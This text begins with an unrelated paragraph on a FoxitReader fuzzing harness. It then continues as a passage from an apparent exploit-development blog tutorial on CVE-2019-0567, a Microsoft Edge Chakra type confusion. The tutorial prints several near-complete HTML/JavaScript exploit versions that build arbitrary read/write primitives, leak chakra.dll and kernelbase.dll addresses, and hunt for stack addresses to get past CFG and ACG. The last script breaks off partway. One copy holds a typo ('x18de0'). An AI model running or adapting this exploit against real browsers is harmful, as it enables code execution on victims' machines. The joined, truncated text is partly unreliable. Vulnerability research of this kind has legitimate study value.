During this process we can notice multiple differences compared to the older versions of FoxitReader, including changes to existing function prototypes and the introduction of new vtable functions that require to be called.

After executing and noting the details of execution, we hit the main conversion function from the vtable of our object, here we can analyse the main parameter (some sort of conversion buffer structure) by viewing its memory and noting its contents.

First we see the initial 4-bytes are a pointer to an offset within the FoxitReader.exe image

Buffer Structure Analysis

This means our harness will have to load the FoxitReader image in-memory to also supply a valid pointer (we also have to fix its IAT and modify the image too, as we discover after testing the harness).

Then we continue noting down the buffer’s contents, including the input file path at offset +0x1624, the output file path at offset +0x182c, and more (including a version string).

Finally after the conversion the object is released and the buffer is freed.

After noting all the above we can make a harness from the information discovered and test.

During testing, certain issues where discovered and accounted for, including exceptions in FoxitReader.exe that was loaded into memory, due to imports being used, this was fixed by fixing up the process IAT when loaded.

Additionally, calls to HeapAlloc were occurring where the heap handle was obtained via an offset in the FoxitReader image loaded in-memory, however it was uninitialised, this was fixed by writing the current process heap handle into the FoxitReader image at the offset HeapAlloc was expecting.

Overall the process was not long and the resulting harness allows for fuzzing of the ConvertToPDF functionality in-memory for FoxitReader 9.7.

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

Introduction

In part one of this blog series on “modern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably “no child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the “closed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");
}
</script>

Nothing about this code differs in the slightest from our previous exploit.js code, except for the fact we are now using an HTML, as obviously this is the type of file Edge expects as it’s a web browser. This also means that we have replaced print() functions with proper document.write() HTML methods in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added functionality in the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line, where our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us choose when we want to detonate our exploit. This will aid us in debugging as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per our post number two in this blog series) and we leak the vftable from one of our DataView objects, from our exploit primitive, which is a pointer into chakra.dll. However, as we are exploiting Edge itself now and not the ChakraCore engine, computation of the base address of chakra.dll will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address. With that said, we will need to talk about debugging Edge in order to compute the base address of chakra.dll.

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe infers, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the actual component of the browser which executes the JavaScript, HTML, and CSS code a user interfaces with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of these processes refers to the actual content we are seeing (the actual exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, and is actually the out-of-process JIT server which we talked about previously in this blog series. What does this actually mean?

JIT’d code is code that is generated as readable, writable, and executable (RWX). This is also known as “dynamic code” which is generated at runtime, and it doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level ACG prohibits any dynamic code (amongst other nuances we will speak of at the appropriate time) from being generated which is readable, writable, and executable (RWX). Since ACG is a mitigation, which was actually developed with browser exploitation and Edge in mind, there is a slight usability issue. Since JIT’d code is a massive component of a modern day browser, this automatically makes ACG incompatible with Edge. If ACG is enabled, then how can JIT’d code be generated, as it is RWX? The solution to this problem is by leveraging an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reason for this is because the JIT process doesn’t handle any execution of “untrusted” JavaScript code - meaning the JIT server can’t really be exploited by browser exploitation-related primitives, like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). The reason is that since the JIT process doesn’t execute any of that JavaScript, HTML, or CSS code, meaning we can infer the JIT server doesn’t handled any “untrusted code”, a.k.a JavaScript provided by a given web page, we can infer that any code running within the JIT server is “trusted” code and therefore we don’t need to place “unnecessary constraints” on the process. With the out-of-process JIT server having no ACG-enablement, this means the JIT server process is now compatible with “JIT” and can generate the needed RWX code that JIT requires. The main issue, however, is how do we get this code (which is currently in a separate process) into the appropriate content process where it will actually be executed?

The way this works is that the out-of-process JIT server will actually take any JIT’d code that needs to be executed, and it will inject it into the content processes that contain the JavaScript code to be executed with proper permissions that are ACG complaint (generally readable/executable). So, at a high level, this out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which has ACG enabled). This allows the Edge content processes, which are responsible for handling untrusted code like a web page that hosts malicious JavaScript to perform memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the “main” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point we can make is that when we do our exploit debugging, we know the content process is responsible for execution of the JavaScript code within our web page - meaning that it is the process we need to debug as it will be responsible for execution of our exploit. However, since the out-of-process JIT server is technically named as a content process, this makes for two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with approximately 100% accuracy is by looking at the two content processes (MicrosoftEdgeCP.exe) and determining which one uses up more RAM. In my testing, the process which uses up more RAM is the target process for debugging (as it is significantly more, and makes sense as the content process has to load JavaScript, HTML, and CSS code into memory for execution). With that in mind, we can break down the process tree as such (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our “exploiting process” we want to debug).

With the aforementioned knowledge we can attach PID 2512 (our content process, which will likely differ on your machine) to WinDbg and know that this is the process responsible for execution of our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we then can click out Click me to exploit CVE-2019-0567 button (you may have to click it twice). This will run our exploit, and from here we can calculate the distance to chakra.dll in order to compute the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from chakra.dll. We can then update our exploit script to the following code, and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");
}
</script>

After computing the base address of chakra.dll the next thing we need to do is, as shown in part two, leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which contains all of the functionality of kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers to kernelbase.dll, which contains many of the important APIs such as VirtualProtect we need to bypass DEP and ACG. Specifically, for our exploit, we will go ahead and extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We then can compute the base address of kernelbase.dll by subtracting the offset to DuplicateHandle from the base of kernelbase.dll in the debugger.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with the following information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");
}
</script>

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Spawn an alert dialogue to pause execution
    alert("DEBUG");
}
</script>

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address) and then we also added an alert() call to create an “alert” dialogue. Since JavaScript will use temporary virtual memory (e.g. memory that isn’t really backed by disk in the form of a 0x7fff address that is backed by a loaded DLL) for objects, this address is only “consistent” for the duration of the process. Think of this in terms of ASLR - when, on Windows, you reboot the system, you can expect images to be loaded at different addresses. This is synonymous with the longevity of the address/address space used for JavaScript objects, except that it is on a “per-script basis” and not a per-boot basis (“per-script” basis is a made-up word by myself to represent the fact the address of a JavaScript object will change after each time the JavaScript code is ran). This is the reason we have the document.write() call and alert() call. The document.write() call will give us the address of our type object, and the alert() dialogue will actually work, in essence, like a breakpoint in that it will pause execution of JavaScript, HTML, or CSS code until the “alert” dialogue has been dealt with. In other words, the JavaScript code cannot be fully executed until the dialogue is dealt with, meaning all of the JavaScript code is loaded into the content process and cannot be released until it is dealt with. This will allow us examine the type pointer before it goes out of scope, and so we can examine it. We will use this same “setup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory about the type pointer changing addresses each time the JavaScript executes

Now, for “real” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our “alert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can talk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have see, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext

In our case, the ThreadContext structure is located at 0x1ca3d72a000.

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which gave us essentially the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0)

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could compute the offset from the leaked stackLimitForCurrentThread consistently between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread with the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching Edge to WinDbg and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to being 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliable compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackForCurrentThreadLimit) is not committed to memory, we will actually get an access violation when attempting to dereference this memory. This means our exploit would be killed, meaning we also can’t “guess” the offset if we want our exploit to be reliable.

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread

I found that about 50-60% of the time I could reliably leak a stack address from the heap. From there, about 50% of the time the stack address that was leaked from the heap was committed to memory. However, there was a varying degree of “failing” - meaning I would often get an access violation on the leaked stack address from the heap. Although I was only succeeding in about half of the exploit attempts, this is significantly greater than trying to “guess” the offset from the stackLimitForCurrenThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason why I didn’t take this approach earlier, is because the stackLimitForCurrentThread seemed to be from a thread stack which was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for the single thread, the stack address we are leaking doesn’t fall anywhere within that range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread which was no longer active and, thus, its stack address space being decommitted. However, in the Google Project Zero issue - stackLimitForCurrentThread wasn’t the item leaked, it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that at offset 0x8f0 that there is a stack address.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offset 0x8a0 and 0x8a8, just like we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreter member of ThreadContext, and that we are likely on a different version of Windows that Ivan, which likely means a different version of Edge and, thus, the slight difference in offset. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread.

However, we can clearly see that not only is this thread committed to memory, it is within the known bounds of another thread’s TEB tracking of the stack (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread because as we have the ability to read/write anywhere within the process space, and because the level of “private” address space Windows uses is on a per-process basis, we can still hijack any thread from the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The “lower level details” are abstracted away from us when it comes to this concept, because regardless of what return address we overwrite, or when the thread terminates, it will have to return control-flow somewhere in memory. Since threads are constantly executing functions, we know that at some point the thread we are dealing with will receive priority for execution and the return address will be executed. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). We are not changing anything, from a foundational perspective, in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
